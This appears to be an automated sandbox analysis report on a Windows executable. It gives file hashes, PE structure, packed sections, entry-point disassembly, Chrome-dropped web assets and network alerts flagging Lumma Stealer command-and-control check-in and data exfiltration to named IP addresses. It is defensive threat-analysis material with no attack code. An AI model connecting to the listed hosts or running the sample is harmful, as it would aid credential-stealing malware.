                                                                                                                                                                          SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                          SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                          Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                          Entropy (8bit):3.875
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:HMB:k
                                                                                                                                                                          MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                          SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                          SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                          SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                          Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):207935
                                                                                                                                                                          Entropy (8bit):5.420780972514107
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                          MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                          SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                          SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                          SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):25441
                                                                                                                                                                          Entropy (8bit):5.152769469811509
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                          MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                          SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                          SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                          SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):207935
                                                                                                                                                                          Entropy (8bit):5.420780972514107
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                          MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                          SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                          SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                          SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                          Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                          Entropy (8bit):4.241202481433726
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                          MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                          SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                          SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                          SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):25441
                                                                                                                                                                          Entropy (8bit):5.152769469811509
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:768:63jAjCjKjvjXLQjt6j+F/XwHv1gWj/rlOVqnACpK3o3hhl0OU2/8BlsRw/6szFrX:PIFIv11pOVqlh382/rIN1v
                                                                                                                                                                          MD5:CCDED74C889AFA3851036BDF0CADB421
                                                                                                                                                                          SHA1:E7263595381709693C603531E5F125F10C01641C
                                                                                                                                                                          SHA-256:E8577F9831DBFDABD050EB0B30AB35060C7CA337DB0911F7F42C09E6E265AA9D
                                                                                                                                                                          SHA-512:3270A6A71CBCA125DADBF9BB3928201D233788CDA14A00DC01865574AC443CADCC2AE80C269657938DC1D9F8F1DB11AAEC48E42D31031635332D9526AF0C9930
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                          Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):15427
                                                                                                                                                                          Entropy (8bit):7.784472070227724
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                          MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                          SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                          SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                          SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                          Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Entropy (8bit):7.947022568165426
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:file.exe
                                                                                                                                                                          File size:1'861'632 bytes
                                                                                                                                                                          MD5:4b54e831bd5f7784815a385aa6e7d42b
                                                                                                                                                                          SHA1:bd934fe052a441874e41294292bfcddc62dad5b9
                                                                                                                                                                          SHA256:6eb0d802a04154bb0f3b0f7441ddef9a9367cd69ca5725085f1f83607437892f
                                                                                                                                                                          SHA512:d9287d498743c0455ba9213255b3a686a6322cb749c73cacaad28878baf00ec3d52b8f716f7df219aeeef1e55d934de38b87f38d37861d7164e3b84a831bf885
                                                                                                                                                                          SSDEEP:24576:ebrdjUXc7tuIA8hwbDD53+DoHfP2BUlFt4VO140nf0d8g/k2zNmyd7GqFtrSre3m:ipjkcJT+Qo/OBCo67grI0GqrSreXCz
                                                                                                                                                                          TLSH:0D853347BAA7F760D09CB2B3C5824A6E7E3736291EE5EE5E5AB50034C1139E2D3D0C46
                                                                                                                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g..............................I...........@...........................I...........@.................................\...p..
                                                                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                                                                          Entrypoint:0x89b000
                                                                                                                                                                          Entrypoint Section:.taggant
                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                          File Version Major:6
                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                          Instruction
                                                                                                                                                                          jmp 00007FBA4961DCCAh
                                                                                                                                                                          cmovbe ebx, dword ptr [eax+eax]
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          jmp 00007FBA4961FCC5h
                                                                                                                                                                          add byte ptr [edx+ecx], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          xor byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax+00000000h], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add al, 0Ah
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add dword ptr [eax+00000000h], eax
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          adc byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add dword ptr [edx], ecx
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                          0x10000x560000x262005b3e9b2616bed68bc0ba5934f469e5d5False0.9992443647540984data7.978830867849266IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .rsrc0x570000x2b00x200824b0bd3c6de353702b92a53a465c7b3False0.796875data6.019100753131269IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          0x590000x2a40000x2002fc7b543c0db969205943d532d9e6594unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          aguiceug0x2fd0000x19d0000x19ca00134e25119fa0654f5c95e4ae29618d06False0.993694500719479data7.952591393265852IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          fauycpnw0x49a0000x10000x400edf75fc62ee59217d0656e16fcb32111False0.76953125data6.0426797798574015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .taggant0x49b0000x30000x2200cd291b90c66b10c2909a8f73f2e95567False0.06732536764705882DOS executable (COM)0.7861965727451796IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                          RT_MANIFEST0x4995c00x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                          DLLImport
                                                                                                                                                                          kernel32.dlllstrcpy
                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                          2024-11-23T19:01:05.930664+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704172.67.162.84443TCP
                                                                                                                                                                          2024-11-23T19:01:06.867648+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704172.67.162.84443TCP
                                                                                                                                                                          2024-11-23T19:01:06.867648+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704172.67.162.84443TCP
                                                                                                                                                                          2024-11-23T19:01:08.186511+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705172.67.162.84443TCP
                                                                                                                                                                          2024-11-23T19:01:09.802871+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705172.67.162.84443TCP
                                                                                                                                                                          2024-11-23T19:01:09.802871+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705172.67.162.84443TCP
                                                                                                                                                                          2024-11-23T19:01:11.466091+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706172.67.162.84443TCP
                                                                                                                                                                          2024-11-23T19:01:14.377133+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707172.67.162.84443TCP
                                                                                                                                                                          2024-11-23T19:01:18.079243+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708172.67.162.84443TCP
                                                                                                                                                                          2024-11-23T19:01:20.969673+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710172.67.162.84443TCP
                                                                                                                                                                          2024-11-23T19:01:21.679558+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549710172.67.162.84443TCP
                                                                                                                                                                          2024-11-23T19:01:24.104433+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549713172.67.162.84443TCP
                                                                                                                                                                          2024-11-23T19:01:33.839931+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549732172.67.162.84443TCP
                                                                                                                                                                          2024-11-23T19:01:34.668332+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549732172.67.162.84443TCP
                                                                                                                                                                          2024-11-23T19:01:36.216604+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.549738185.215.113.1680TCP
                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                          Nov 23, 2024 19:01:00.527349949 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                          Nov 23, 2024 19:01:00.527353048 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                          Nov 23, 2024 19:01:00.652429104 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                          Nov 23, 2024 19:01:04.498123884 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                          Nov 23, 2024 19:01:04.498186111 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:04.498279095 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                          Nov 23, 2024 19:01:04.499980927 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                          Nov 23, 2024 19:01:04.500000954 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:05.930407047 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:05.930664062 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                          Nov 23, 2024 19:01:05.934883118 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                          Nov 23, 2024 19:01:05.934896946 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:05.935177088 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:05.980468988 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                          Nov 23, 2024 19:01:05.991417885 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                          Nov 23, 2024 19:01:05.991452932 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                          Nov 23, 2024 19:01:05.991493940 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:06.867665052 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:06.867758036 CET44349704172.67.162.84192.168.2.5
                                                                                                                                                                          Nov 23, 2024 19:01:06.867825031 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                          Nov 23, 2024 19:01:06.870641947 CET49704443192.168.2.5172.67.162.84
                                                                                                                                                                          Nov 23, 2024 19:01:06.870671034 CET44349704172.67.162.84192.168.2.5
